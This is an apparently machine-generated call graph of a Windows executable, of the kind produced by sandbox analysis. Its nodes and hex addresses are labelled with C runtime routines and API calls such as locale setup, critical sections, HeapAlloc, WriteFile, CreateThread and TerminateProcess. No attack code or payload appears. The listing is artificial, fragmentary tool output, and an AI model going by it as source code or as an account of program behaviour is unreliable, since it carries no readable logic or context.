45c29e std::locale::_Setgloballocale 23 API calls 14125->14128 14129 463031 14128->14129 14132 45eb00 __Getctype 41 API calls 14135 462fb1 14132->14135 14133 45eb00 __Getctype 41 API calls 14133->14134 14186 462fcb 14134->14186 14136 45eb00 __Getctype 41 API calls 14135->14136 14135->14137 14136->14137 14137->13943 14139 458e27 __fread_nolock std::locale::_Setgloballocale 14138->14139 14140 458e53 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14139->14140 14143 458f24 std::locale::_Setgloballocale 14140->14143 14142 458f42 14142->13950 14215 454791 14143->14215 14145 462d38 __FrameHandler3::FrameUnwindToState 14144->14145 14150 45a722 EnterCriticalSection 14145->14150 14147 462d46 14151 462d84 14147->14151 14150->14147 14154 45a76a LeaveCriticalSection 14151->14154 14153 45b0ac 14153->13943 14153->14111 14154->14153 14191 458f53 14155->14191 14158->14118 14160 45eb16 14159->14160 14161 45eb1c 14159->14161 14163 45f334 __dosmaperr 6 API calls 14160->14163 14162 45f373 __dosmaperr 6 API calls 14161->14162 14165 45eb20 SetLastError 14161->14165 14164 45eb38 14162->14164 14163->14161 14164->14165 14167 45edeb __dosmaperr 14 API calls 14164->14167 14169 45ebb5 14165->14169 14170 45ebb0 14165->14170 14168 45eb4d 14167->14168 14171 45eb55 14168->14171 14172 45eb66 14168->14172 14173 45b0a7 __FrameHandler3::FrameUnwindToState 39 API calls 14169->14173 14170->14133 14175 45f373 __dosmaperr 6 API calls 14171->14175 14176 45f373 __dosmaperr 6 API calls 14172->14176 14174 45ebba 14173->14174 14177 45eb63 14175->14177 14178 45eb72 14176->14178 14182 45ee48 ___free_lconv_mon 14 API calls 14177->14182 14179 45eb76 14178->14179 14180 45eb8d 14178->14180 14181 45f373 __dosmaperr 6 API calls 14179->14181 14183 45e92e __dosmaperr 14 API calls 14180->14183 14181->14177 14182->14165 14184 45eb98 14183->14184 14185 45ee48 ___free_lconv_mon 14 API calls 14184->14185 14185->14165 14187 462fd1 14186->14187 14188 462fa2 14186->14188 14214 45a76a LeaveCriticalSection 14187->14214 14188->14132 14188->14135 14188->14137 14190->14125 14192 458f65 _Fputc 14191->14192 14197 458f8a 14192->14197 14194 458f7d 14208 458d43 14194->14208 14198 458fa1 14197->14198 14199 458f9a 14197->14199 14201 458d7f _Fputc GetLastError SetLastError 14198->14201 14204 458faf 14198->14204 14200 458da8 _Fputc 16 API calls 14199->14200 14200->14198 14202 458fd6 14201->14202 14203 459034 __Getctype 11 API calls 14202->14203 14202->14204 14205 459006 14203->14205 14204->14194 14206 458f53 _Deallocate 41 API calls 14205->14206 14207 459013 14206->14207 14207->14194 14209 458d4f 14208->14209 14210 458d66 14209->14210 14212 458dee _Fputc 41 API calls 14209->14212 14211 458d79 14210->14211 14213 458dee _Fputc 41 API calls 14210->14213 14211->14137 14212->14210 14213->14211 14214->14188 14216 454799 14215->14216 14217 45479a IsProcessorFeaturePresent 14215->14217 14216->14142 14219 4550d2 14217->14219 14222 455095 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14219->14222 14221 4551b5 14221->14142 14222->14221 14224 464cc0 __FrameHandler3::FrameUnwindToState 14223->14224 14225 464cda 14224->14225 14269 45a722 EnterCriticalSection 14224->14269 14227 464b89 14225->14227 14230 45b0a7 __FrameHandler3::FrameUnwindToState 41 API calls 14225->14230 14234 4648df 14227->14234 14228 464d16 14270 464d33 14228->14270 14231 464d53 14230->14231 14232 464cea 14232->14228 14233 45ee48 ___free_lconv_mon 14 API calls 14232->14233 14233->14228 14274 45b19b 14234->14274 14237 464912 14239 464929 14237->14239 14240 464917 GetACP 14237->14240 14238 464900 GetOEMCP 14238->14239 14239->13900 14241 461e71 14239->14241 14240->14239 14242 461eaf 14241->14242 14243 461e7f 14241->14243 14245 45b188 __strnicoll 14 API calls 14242->14245 14244 461e9a HeapAlloc 14243->14244 14248 461e83 __dosmaperr 14243->14248 14247 461ead 14244->14247 14244->14248 14246 461eb4 14245->14246 14246->13903 14246->13904 14247->14246 14248->14242 14248->14244 14249 45dac3 std::ios_base::_Init 2 API calls 14248->14249 14249->14248 14251 4648df 43 API calls 14250->14251 14252 464dcf 14251->14252 14254 464e0c IsValidCodePage 14252->14254 14259 464e48 __fread_nolock 14252->14259 14253 454791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14256 464bf6 14253->14256 14255 464e1e 14254->14255 14254->14259 14257 464e4d GetCPInfo 14255->14257 14260 464e27 __fread_nolock 14255->14260 14256->13908 14256->13913 14257->14259 14257->14260 14259->14253 14259->14259 14316 4649b3 14260->14316 14262 4647dd __FrameHandler3::FrameUnwindToState 14261->14262 14397 45a722 EnterCriticalSection 14262->14397 14264 4647e7 14398 46481e 14264->14398 14269->14232 14273 45a76a LeaveCriticalSection 14270->14273 14272 464d3a 14272->14225 14273->14272 14275 45b1b9 14274->14275 14281 45b1b2 14274->14281 14276 45eb00 __Getctype 41 API calls 14275->14276 14275->14281 14277 45b1da 14276->14277 14282 46256a 14277->14282 14281->14237 14281->14238 14283 45b1f0 14282->14283 14284 46257d 14282->14284 14286 4625c8 14283->14286 14284->14283 14290 4666ea 14284->14290 14287 4625f0 14286->14287 14288 4625db 14286->14288 14287->14281 14288->14287 14311 464d9c 14288->14311 14291 4666f6 __FrameHandler3::FrameUnwindToState 14290->14291 14292 45eb00 __Getctype 41 API calls 14291->14292 14293 4666ff 14292->14293 14300 466745 14293->14300 14303 45a722 EnterCriticalSection 14293->14303 14295 46671d 14304 46676b 14295->14304 14300->14283 14301 45b0a7 __FrameHandler3::FrameUnwindToState 41 API calls 14302 46676a 14301->14302 14303->14295 14305 466779 __Getctype 14304->14305 14307 46672e 14304->14307 14306 46649e __Getctype 14 API calls 14305->14306 14305->14307 14306->14307 14308 46674a 14307->14308 14309 45a76a std::_Lockit::~_Lockit LeaveCriticalSection 14308->14309 14310 466741 14309->14310 14310->14300 14310->14301 14312 45eb00 __Getctype 41 API calls 14311->14312 14313 464da1 14312->14313 14314 464cb4 __strnicoll 41 API calls 14313->14314 14315 464dac 14314->14315 14315->14287 14317 4649db GetCPInfo 14316->14317 14318 464aa4 14316->14318 14317->14318 14319 4649f3 14317->14319 14320 454791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14318->14320 14327 462988 14319->14327 14323 464b5d 14320->14323 14323->14259 14326 462c7f 46 API calls 14326->14318 14328 45b19b __strnicoll 41 API calls 14327->14328 14329 4629a8 14328->14329 14347 463c28 14329->14347 14331 462a6c 14334 454791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14331->14334 14332 462a64 14350 454522 14332->14350 14333 4629d5 14333->14331 14333->14332 14336 461e71 std::_Locinfo::_Locinfo_dtor 15 API calls 14333->14336 14338 4629fa __fread_nolock __alloca_probe_16 14333->14338 14337 462a8f 14334->14337 14336->14338 14342 462c7f 14337->14342 14338->14332 14339 463c28 __strnicoll MultiByteToWideChar 14338->14339 14340 462a45 14339->14340 14340->14332 14341 462a50 GetStringTypeW 14340->14341 14341->14332 14343 45b19b __strnicoll 41 API calls 14342->14343 14344 462c92 14343->14344 14357 462a91 14344->14357 14348 463c39 MultiByteToWideChar 14347->14348 14348->14333 14351 45452c 14350->14351 14352 45453d 14350->14352 14351->14352 14354 45a6c6 14351->14354 14352->14331 14355 45ee48 ___free_lconv_mon 14 API calls 14354->14355 14356 45a6de 14355->14356 14356->14352 14358 462aac ctype 14357->14358 14359 463c28 __strnicoll MultiByteToWideChar 14358->14359 14362 462af2 14359->14362 14360 462c6a 14361 454791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14360->14361 14363 462c7d 14361->14363 14362->14360 14364 461e71 std::_Locinfo::_Locinfo_dtor 15 API calls 14362->14364 14366 462b18 __alloca_probe_16 14362->14366 14377 462b9e 14362->14377 14363->14326 14364->14366 14365 454522 __freea 14 API calls 14365->14360 14367 463c28 __strnicoll MultiByteToWideChar 14366->14367 14366->14377 14368 462b5d 14367->14368 14368->14377 14385 45f4f2 14368->14385 14371 462bc7 14373 462c52 14371->14373 14374 461e71 std::_Locinfo::_Locinfo_dtor 15 API calls 14371->14374 14378 462bd9 __alloca_probe_16 14371->14378 14372 462b8f 14376 45f4f2 std::_Locinfo::_Locinfo_dtor 7 API calls 14372->14376 14372->14377 14375 454522 __freea 14 API calls 14373->14375 14374->14378 14375->14377 14376->14377 14377->14365 14378->14373 14379 45f4f2 std::_Locinfo::_Locinfo_dtor 7 API calls 14378->14379 14380 462c1c 14379->14380 14380->14373 14394 463ca4 14380->14394 14382 462c36 14382->14373 14383 462c3f 14382->14383 14384 454522 __freea 14 API calls 14383->14384 14384->14377 14386 45f024 std::_Locinfo::_Locinfo_dtor 5 API calls 14385->14386 14387 45f4fd 14386->14387 14388 45f503 LCMapStringEx 14387->14388 14389 45f52a 14387->14389 14393 45f54a 14388->14393 14390 45f54f __strnicoll 5 API calls 14389->14390 14392 45f543 LCMapStringW 14390->14392 14392->14393 14393->14371 14393->14372 14393->14377 14396 463cbb WideCharToMultiByte 14394->14396 14396->14382 14397->14264 14408 459c89 14398->14408 14400 464840 14401 459c89 __fread_nolock 41 API calls 14400->14401 14402 46485f 14401->14402 14403 4647f4 14402->14403 14404 45ee48 ___free_lconv_mon 14 API calls 14402->14404 14405 464812 14403->14405 14404->14403 14422 45a76a LeaveCriticalSection 14405->14422 14407 464800 14407->13914 14409 459c9a 14408->14409 14417 459c96 _Yarn 14408->14417 14410 459ca1 14409->14410 14413 459cb4 __fread_nolock 14409->14413 14411 45b188 __strnicoll 14 API calls 14410->14411 14412 459ca6 14411->14412 14414 459007 __strnicoll 41 API calls 14412->14414 14415 459ce2 14413->14415 14416 459ceb 14413->14416 14413->14417 14414->14417 14418 45b188 __strnicoll 14 API calls 14415->14418 14416->14417 14420 45b188 __strnicoll 14 API calls 14416->14420 14417->14400 14419 459ce7 14418->14419 14421 459007 __strnicoll 41 API calls 14419->14421 14420->14419 14421->14417 14422->14407 14424 45e074 14423->14424 14426 45e082 14423->14426 14424->14426 14430 45e09a 14424->14430 14425 45b188 __strnicoll 14 API calls 14427 45e08a 14425->14427 14426->14425 14428 459007 __strnicoll 41 API calls 14427->14428 14429 45e094 14428->14429 14429->13858 14430->14429 14431 45b188 __strnicoll 14 API calls 14430->14431 14431->14427 14433 45bde7 14432->14433 14437 45bdb8 14432->14437 14434 45bdfe 14433->14434 14435 45ee48 ___free_lconv_mon 14 API calls 14433->14435 14436 45ee48 ___free_lconv_mon 14 API calls 14434->14436 14435->14433 14436->14437 14437->13859 14439 459040 14438->14439 14440 458e0b std::locale::_Setgloballocale 8 API calls 14439->14440 14441 459055 GetCurrentProcess TerminateProcess 14440->14441 14441->13865 14444 451737 __EH_prolog3_catch _strlen 14442->14444 14476 451aff 14444->14476 14446 4518d8 14489 451ae4 14446->14489 14448 4518e0 std::ios_base::_Init 14448->13668 14449 45179c 14480 4514f1 14449->14480 14451 4515d4 _strlen 14450->14451 14626 4518ee 14451->14626 14453 4515e1 14453->13670 14455 4516aa 14454->14455 14457 451680 std::ios_base::_Init 14454->14457 14633 4519c7 14455->14633 14457->13672 14459 46c01c 14458->14459 14460 46c089 14459->14460 14653 451e21 14459->14653 14462 46c09c 14460->14462 14463 451a7b _Deallocate 41 API calls 14460->14463 14462->13677 14463->14462 14465 45479f std::ios_base::_Init 43 API calls 14464->14465 14467 46c0c4 14465->14467 14468 451a7b _Deallocate 41 API calls 14467->14468 14469 46c1f5 14467->14469 14675 451cbf 14467->14675 14468->14467 14470 454791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14469->14470 14471 46c210 CreateThread WaitForSingleObjectEx 14470->14471 14472 451644 14471->14472 14473 45164f 14472->14473 14474 451658 14472->14474 14475 451a7b _Deallocate 41 API calls 14473->14475 14474->13682 14475->14474 14478 451b1d 14476->14478 14477 451b40 14477->14449 14478->14477 14493 451ba4 14478->14493 14481 45154c 14480->14481 14482 451508 std::ios_base::_Init 14480->14482 14481->14446 14488 451541 14482->14488 14501 4514c8 14482->14501 14484 45155a 14507 45144e 14484->14507 14504 455ad1 14488->14504 14490 451aec 14489->14490 14491 451af7 14490->14491 14622 451c62 14490->14622 14491->14448 14494 451bb0 __EH_prolog3_catch 14493->14494 14495 451aff 43 API calls 14494->14495 14496 451c55 std::ios_base::_Init 14494->14496 14497 451bcf 14495->14497 14496->14477 14498 451c4d 14497->14498 14500 4514f1 std::ios_base::_Init 43 API calls 14497->14500 14499 451ae4 43 API calls 14498->14499 14499->14496 14500->14498 14510 4513dd 14501->14510 14505 455b18 RaiseException 14504->14505 14506 455aeb 14504->14506 14505->14484 14506->14505 14619 451105 14507->14619 14511 4515b7 std::ios_base::_Init 43 API calls 14510->14511 14512 451401 14511->14512 14519 45134d 14512->14519 14515 451644 std::ios_base::_Init 41 API calls 14516 45141c 14515->14516 14517 454791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14516->14517 14518 451430 14517->14518 14518->14488 14530 451610 14519->14530 14526 451644 std::ios_base::_Init 41 API calls 14527 451390 14526->14527 14528 454791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14527->14528 14529 4513af 14528->14529 14529->14515 14531 451630 14530->14531 14550 45195f 14531->14550 14533 45136e 14534 4512cb 14533->14534 14535 4512e6 _strlen 14534->14535 14536 4512fc 14534->14536 14537 45166a std::ios_base::_Init 43 API calls 14535->14537 14538 45166a std::ios_base::_Init 43 API calls 14536->14538 14537->14536 14539 451322 14538->14539 14540 451644 std::ios_base::_Init 41 API calls 14539->14540 14541 45132a std::ios_base::_Init 14540->14541 14542 451644 std::ios_base::_Init 41 API calls 14541->14542 14543 45133d 14542->14543 14544 454791 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14543->14544 14545 45134b 14544->14545 14546 451209 14545->14546 14547 451216 14546->14547 14601 4510d0 14547->14601 14551 4519c1 14550->14551 14554 451970 std::ios_base::_Init 14550->14554 14565 4511fe 14551->14565 14555 451977 _Yarn std::ios_base::_Init 14554->14555 14557 451f40 14554->14557 14555->14533 14558 451f53 14557->14558 14559 451f4b 14557->14559 14561 451f5f 14558->14561 14582 45479f 14558->14582 14568 451f6d 14559->14568 14561->14555 14562 451f51 14562->14555 14564 451f5d 14564->14555 14596 453a16 14565->14596 14569 451f7c 14568->14569 14571 45118f Concurrency::cancel_current_task 14568->14571 14570 45479f std::ios_base::_Init 43 API calls 14569->14570 14572 451f82 14570->14572 14574 455ad1 Concurrency::cancel_current_task RaiseException 14571->14574 14573 451f89 14572->14573 14577 458f53 _Deallocate 41 API calls 14572->14577 14573->14562 14575 4511ab 14574->14575 14576 451105 std::bad_exception::bad_exception 42 API calls 14575->14576 14578 4511b8 14576->14578 14579 459026 14577->14579 14578->14562 14580 459034 __Getctype 11 API calls 14579->14580 14581 459033 14580->14581 14584 4547a4 14582->14584 14583 45a798 ___std_exception_copy 15 API calls 14583->14584 14584->14583 14585 4547be 14584->14585 14586 45dac3 std::ios_base::_Init EnterCriticalSection LeaveCriticalSection 14584->14586 14587 4547c0 14584->14587 14585->14564 14586->14584 14588 45118f Concurrency::cancel_current_task 14587->14588 14589 4547ca std::ios_base::_Init 14587->14589 14590 455ad1 Concurrency::cancel_current_task RaiseException 14588->14590 14591 455ad1 Concurrency::cancel_current_task RaiseException 14589->14591 14592 4511ab 14590->14592 14594 4552ae 14591->14594 14593 451105 std::bad_exception::bad_exception 42 API calls 14592->14593 14595 4511b8 14593->14595 14595->14564 14597 4539bd std::invalid_argument::invalid_argument 42 API calls 14596->14597 14598 453a27 14597->14598 14599 455ad1 Concurrency::cancel_current_task RaiseException 14598->14599 14600 453a35 14599->14600 14604 4552eb 14601->14604 14605 4552f8 14604->14605 14611 4510fc 14604->14611 14605->14611 14612 45a798 14605->14612 14608 45a6c6 ___std_exception_copy 14 API calls 14608->14611 14609 45e066 ___std_exception_copy 41 API calls 14610 455325 14609->14610 14610->14608 14611->14526 14618 461e71 __dosmaperr 14612->14618 14613 461eaf 14615 45b188 __strnicoll 14 API calls 14613->14615 14614 461e9a HeapAlloc 14616 455315 14614->14616 14614->14618 14615->14616 14616->14609 14616->14610 14617 45dac3 std::ios_base::_Init EnterCriticalSection LeaveCriticalSection 14617->14618 14618->14613 14618->14614 14618->14617 14620 4552eb ___std_exception_copy 42 API calls 14619->14620 14621 451126 14620->14621 14621->14446 14624 451c6e __EH_prolog3_catch 14622->14624 14623 451caa std::ios_base::_Init 14623->14491 14624->14623 14625 4514f1 std::ios_base::_Init 43 API calls 14624->14625 14625->14623 14627 4518ff std::ios_base::_Init 14626->14627 14628 451959 14626->14628 14631 451f40 std::ios_base::_Init 43 API calls 14627->14631 14632 451906 std::ios_base::_Init 14627->14632 14629 4511fe std::ios_base::_Init 43 API calls 14628->14629 14630 45195e 14629->14630 14631->14632 14632->14453 14634 451a75 14633->14634 14635 4519e4 std::ios_base::_Init 14633->14635 14636 4511fe std::ios_base::_Init 43 API calls 14634->14636 14638 451f40 std::ios_base::_Init 43 API calls 14635->14638 14637 451a7a 14636->14637 14639 451a03 std::ios_base::_Init 14638->14639 14641 451a43 std::ios_base::_Init 14639->14641 14642 451a7b 14639->14642 14641->14457 14643 451a88 14642->14643 14644 451a95 ctype 14642->14644 14646 4511dc 14643->14646 14644->14641 14647 4511f6 14646->14647 14648 4511f9 14646->14648 14647->14644 14649 458f53 _Deallocate 41 API calls 14648->14649 14650 459026 14649->14650 14651 459034 __Getctype 11 API calls 14650->14651 14652 459033 14651->14652 14654 451e2d __EH_prolog3_catch 14653->14654 14655 451f30 14654->14655 14656 451e4a 14654->14656 14666 451f62 14655->14666 14658 451e67 14656->14658 14659 451f35 14656->14659 14661 451f40 std::ios_base::_Init 43 API calls 14658->14661 14669 45118f 14659->14669 14663 451e7d _Yarn 14661->14663 14664 451efc std::ios_base::_Init 14663->14664 14665 451a7b _Deallocate 41 API calls 14663->14665 14664->14459 14665->14664 14667 453a16 std::_Xinvalid_argument 43 API calls 14666->14667 14668 451f6c 14667->14668 14670 45119d Concurrency::cancel_current_task 14669->14670 14671 455ad1 Concurrency::cancel_current_task RaiseException 14670->14671 14672 4511ab 14671->14672 14673 451105 std::bad_exception::bad_exception 42 API calls 14672->14673 14674 4511b8 14673->14674 14676 451ccb __EH_prolog3_catch 14675->14676 14677 451dd2 14676->14677 14678 451ce8 14676->14678 14680 451f62 43 API calls 14677->14680 14679 451d05 14678->14679 14681 451dd7 14678->14681 14682 451f40 std::ios_base::_Init 43 API calls 14679->14682 14680->14681 14683 45118f Concurrency::cancel_current_task 43 API calls 14681->14683 14685 451d1b _Yarn 14682->14685 14684 451ddc 14683->14684 14686 451d9e std::ios_base::_Init 14685->14686 14687 451a7b _Deallocate 41 API calls 14685->14687 14686->14467 14687->14686 14689 45c101 14688->14689 14690 45c0ef 14688->14690 14700 45bf8a 14689->14700 14715 45c18a GetModuleHandleW 14690->14715 14694 45477e 14694->13708 14699 45c153 14701 45bf96 __FrameHandler3::FrameUnwindToState 14700->14701 14723 45a722 EnterCriticalSection 14701->14723 14703 45bfa0 14724 45bfd7 14703->14724 14705 45bfad 14728 45bfcb 14705->14728 14708 45c159 14753 45c1cd 14708->14753 14711 45c177 14713 45c1ef std::locale::_Setgloballocale 3 API calls 14711->14713 14712 45c167 GetCurrentProcess TerminateProcess 14712->14711 14714 45c17f ExitProcess 14713->14714 14716 45c0f4 14715->14716 14716->14689 14717 45c1ef GetModuleHandleExW 14716->14717 14718 45c24f 14717->14718 14719 45c22e GetProcAddress 14717->14719 14721 45c255 FreeLibrary 14718->14721 14722 45c100 14718->14722 14719->14718 14720 45c242 14719->14720 14720->14718 14721->14722 14722->14689 14723->14703 14725 45bfe3 __FrameHandler3::FrameUnwindToState 14724->14725 14726 45c04a std::locale::_Setgloballocale 14725->14726 14731 45ddf4 14725->14731 14726->14705 14752 45a76a LeaveCriticalSection 14728->14752 14730 45bfb9 14730->14694 14730->14708 14732 45de00 __EH_prolog3 14731->14732 14735 45db4c 14732->14735 14734 45de27 std::ios_base::_Init 14734->14726 14736 45db58 __FrameHandler3::FrameUnwindToState 14735->14736 14743 45a722 EnterCriticalSection 14736->14743 14738 45db66 14744 45dd04 14738->14744 14743->14738 14745 45dd23 14744->14745 14746 45db73 14744->14746 14745->14746 14747 45ee48 ___free_lconv_mon 14 API calls 14745->14747 14748 45db9b 14746->14748 14747->14746 14751 45a76a LeaveCriticalSection 14748->14751 14750 45db84 14750->14734 14751->14750 14752->14730 14758 46547e GetPEB 14753->14758 14756 45c1d7 GetPEB 14757 45c163 14756->14757 14757->14711 14757->14712 14759 45c1d2 14758->14759 14760 465498 14758->14760 14759->14756 14759->14757 14762 45f1a6 14760->14762 14763 45f123 std::_Locinfo::_Locinfo_dtor 5 API calls 14762->14763 14764 45f1c2 14763->14764 14764->14759 14766 45dfa6 14765->14766 14769 45dfb8 ___scrt_uninitialize_crt 14765->14769 14767 45dfb4 14766->14767 14770 45965a 14766->14770 14767->13701 14769->13701 14773 4594e7 14770->14773 14776 4593db 14773->14776 14777 4593e7 __FrameHandler3::FrameUnwindToState 14776->14777 14784 45a722 EnterCriticalSection 14777->14784 14779 45945d 14793 45947b 14779->14793 14780 4593f1 ___scrt_uninitialize_crt 14780->14779 14785 45934f 14780->14785 14784->14780 14786 45935b __FrameHandler3::FrameUnwindToState 14785->14786 14796 4591d2 EnterCriticalSection 14786->14796 14788 459365 ___scrt_uninitialize_crt 14792 45939e 14788->14792 14797 4595f5 14788->14797 14810 4593cf 14792->14810 14912 45a76a LeaveCriticalSection 14793->14912 14795 459469 14795->14767 14796->14788 14798 45960a _Fputc 14797->14798 14799 459611 14798->14799 14800 45961c 14798->14800 14802 4594e7 ___scrt_uninitialize_crt 70 API calls 14799->14802 14813 45958c 14800->14813 14804 459617 14802->14804 14805 458d43 _Fputc 41 API calls 14804->14805 14807 459654 14805->14807 14807->14792 14808 45963d 14826 45fbc1 14808->14826 14911 4591e6 LeaveCriticalSection 14810->14911 14812 4593bd 14812->14780 14814 4595a5 14813->14814 14815 4595cc 14813->14815 14814->14815 14816 45f8e9 __fread_nolock 41 API calls 14814->14816 14815->14804 14819 45f8e9 14815->14819 14817 4595c1 14816->14817 14837 4603ec 14817->14837 14820 45f8f5 14819->14820 14821 45f90a 14819->14821 14822 45b188 __strnicoll 14 API calls 14820->14822 14821->14808 14823 45f8fa 14822->14823 14824 459007 __strnicoll 41 API calls 14823->14824 14825 45f905 14824->14825 14825->14808 14827 45fbd2 14826->14827 14831 45fbdf 14826->14831 14828 45b188 __strnicoll 14 API calls 14827->14828 14836 45fbd7 14828->14836 14829 45fc28 14830 45b188 __strnicoll 14 API calls 14829->14830 14832 45fc2d 14830->14832 14831->14829 14833 45fc06 14831->14833 14834 459007 __strnicoll 41 API calls 14832->14834 14878 45fb1f 14833->14878 14834->14836 14836->14804 14838 4603f8 __FrameHandler3::FrameUnwindToState 14837->14838 14839 460400 14838->14839 14840 4604bc 14838->14840 14842 46044d 14838->14842 14839->14815 14841 458f8a _Fputc 41 API calls 14840->14841 14841->14839 14848 4655fd EnterCriticalSection 14842->14848 14844 460453 14845 460470 14844->14845 14849 4604f4 14844->14849 14875 4604b4 14845->14875 14848->14844 14850 460519 14849->14850 14874 46053c __fread_nolock 14849->14874 14851 46051d 14850->14851 14853 46057b 14850->14853 14852 458f8a _Fputc 41 API calls 14851->14852 14852->14874 14854 460592 14853->14854 14855 461cd2 ___scrt_uninitialize_crt 43 API calls 14853->14855 14856 460078 ___scrt_uninitialize_crt 42 API calls 14854->14856 14855->14854 14857 46059c 14856->14857 14858 4605e2 14857->14858 14859 4605a2 14857->14859 14862 4605f6 14858->14862 14863 460645 WriteFile 14858->14863 14860 4605cc 14859->14860 14861 4605a9 14859->14861 14864 45fc3e ___scrt_uninitialize_crt 47 API calls 14860->14864 14868 460010 ___scrt_uninitialize_crt 6 API calls 14861->14868 14861->14874 14866 460633 14862->14866 14867 4605fe 14862->14867 14865 460667 GetLastError 14863->14865 14863->14874 14864->14874 14865->14874 14869 4600f6 ___scrt_uninitialize_crt 7 API calls 14866->14869 14870 460603 14867->14870 14871 460621 14867->14871 14868->14874 14869->14874 14873 4601d1 ___scrt_uninitialize_crt 7 API calls 14870->14873 14870->14874 14872 4602ba ___scrt_uninitialize_crt 8 API calls 14871->14872 14872->14874 14873->14874 14874->14845 14876 465620 ___scrt_uninitialize_crt LeaveCriticalSection 14875->14876 14877 4604ba 14876->14877 14877->14839 14879 45fb2b __FrameHandler3::FrameUnwindToState 14878->14879 14891 4655fd EnterCriticalSection 14879->14891 14881 45fb3a 14882 45fb7f 14881->14882 14892 4656d4 14881->14892 14884 45b188 __strnicoll 14 API calls 14882->14884 14886 45fb86 14884->14886 14885 45fb66 FlushFileBuffers 14885->14886 14887 45fb72 GetLastError 14885->14887 14908 45fbb5 14886->14908 14905 45b175 14887->14905 14891->14881 14893 4656e1 14892->14893 14895 4656f6 14892->14895 14894 45b175 __dosmaperr 14 API calls 14893->14894 14897 4656e6 14894->14897 14896 45b175 __dosmaperr 14 API calls 14895->14896 14898 46571b 14895->14898 14899 465726 14896->14899 14900 45b188 __strnicoll 14 API calls 14897->14900 14898->14885 14901 45b188 __strnicoll 14 API calls 14899->14901 14902 4656ee 14900->14902 14903 46572e 14901->14903 14902->14885 14904 459007 __strnicoll 41 API calls 14903->14904 14904->14902 14906 45ec51 __dosmaperr 14 API calls 14905->14906 14907 45b17a 14906->14907 14907->14882 14909 465620 ___scrt_uninitialize_crt LeaveCriticalSection 14908->14909 14910 45fb9e 14909->14910 14910->14836 14911->14812 14912->14795 15646 451000 15651 4521db 15646->15651 15648 451013 15649 454a41 44 API calls 15648->15649 15650 45101d 15649->15650 15652 4521e7 __EH_prolog3 15651->15652 15655 452f32 15652->15655 15654 452239 std::ios_base::_Init 15654->15648 15664 452bd6 15655->15664 15657 452f3d 15672 45358f 15657->15672 15659 452f50 15660 452f69 15659->15660 15661 4514f1 std::ios_base::_Init 43 API calls 15659->15661 15663 452f75 15660->15663 15676 454121 15660->15676 15661->15660 15663->15654 15665 452be2 __EH_prolog3 15664->15665 15666 4514f1 std::ios_base::_Init 43 API calls 15665->15666 15667 452c13 15666->15667 15668 45479f std::ios_base::_Init 43 API calls 15667->15668 15669 452c1a 15668->15669 15670 452c2b std::ios_base::_Init 15669->15670 15681 453c8b 15669->15681 15670->15657 15673 45359b __EH_prolog3 15672->15673 15725 452121 15673->15725 15675 4535b3 std::ios_base::_Ios_base_dtor std::ios_base::_Init 15675->15659 15677 453aa8 std::_Lockit::_Lockit 7 API calls 15676->15677 15678 454131 15677->15678 15679 453b00 std::_Lockit::~_Lockit 2 API calls 15678->15679 15680 45416f 15679->15680 15680->15663 15682 453c97 __EH_prolog3 15681->15682 15683 453aa8 std::_Lockit::_Lockit 7 API calls 15682->15683 15684 453ca2 15683->15684 15692 453cd3 15684->15692 15693 453dee 15684->15693 15686 453b00 std::_Lockit::~_Lockit 2 API calls 15688 453d10 std::ios_base::_Init 15686->15688 15687 453cb5 15699 453e11 15687->15699 15688->15670 15692->15686 15694 45479f std::ios_base::_Init 43 API calls 15693->15694 15695 453df9 15694->15695 15696 453e0d 15695->15696 15709 453b1f 15695->15709 15696->15687 15700 453e1d 15699->15700 15701 453cbd 15699->15701 15712 4542c9 15700->15712 15703 453be3 15701->15703 15704 453bf1 15703->15704 15708 453c1c _Yarn 15703->15708 15705 453bfd 15704->15705 15706 45a6c6 ___std_exception_copy 14 API calls 15704->15706 15707 45a798 ___std_exception_copy 15 API calls 15705->15707 15705->15708 15706->15705 15707->15708 15708->15692 15710 453be3 _Yarn 15 API calls 15709->15710 15711 453b59 15710->15711 15711->15687 15713 45b0a7 15712->15713 15714 4542d9 EncodePointer 15712->15714 15715 462dfa std::locale::_Setgloballocale 2 API calls 15713->15715 15714->15701 15714->15713 15716 45b0ac 15715->15716 15717 45b0b7 15716->15717 15718 462e3f std::locale::_Setgloballocale 41 API calls 15716->15718 15719 45b0c1 IsProcessorFeaturePresent 15717->15719 15720 45b0e0 15717->15720 15718->15717 15721 45b0cd 15719->15721 15722 45c29e std::locale::_Setgloballocale 23 API calls 15720->15722 15723 458e0b std::locale::_Setgloballocale 8 API calls 15721->15723 15724 45b0ea 15722->15724 15723->15720 15726 45212d __EH_prolog3 15725->15726 15727 453aa8 std::_Lockit::_Lockit 7 API calls 15726->15727 15728 452137 15727->15728 15741 4525ec 15728->15741 15730 45214e 15740 452161 15730->15740 15747 452a70 15730->15747 15731 453b00 std::_Lockit::~_Lockit 2 API calls 15732 4521a8 std::ios_base::_Init 15731->15732 15732->15675 15734 452171 15735 4521b0 15734->15735 15736 452178 15734->15736 15760 452d20 15735->15760 15757 453c59 15736->15757 15740->15731 15742 45261c 15741->15742 15743 4525f8 15741->15743 15742->15730 15744 453aa8 std::_Lockit::_Lockit 7 API calls 15743->15744 15745 452602 15744->15745 15746 453b00 std::_Lockit::~_Lockit 2 API calls 15745->15746 15746->15742 15749 452a7c __EH_prolog3 15747->15749 15748 452acd std::ios_base::_Init 15748->15734 15749->15748 15750 45479f std::ios_base::_Init 43 API calls 15749->15750 15752 452a95 codecvt 15750->15752 15751 452abc 15751->15748 15779 452506 15751->15779 15752->15751 15764 45232a 15752->15764 15755 452ab1 15776 4522b4 15755->15776 15758 45479f std::ios_base::_Init 43 API calls 15757->15758 15759 453c64 15758->15759 15759->15740 15761 452d2e Concurrency::cancel_current_task 15760->15761 15762 455ad1 Concurrency::cancel_current_task RaiseException 15761->15762 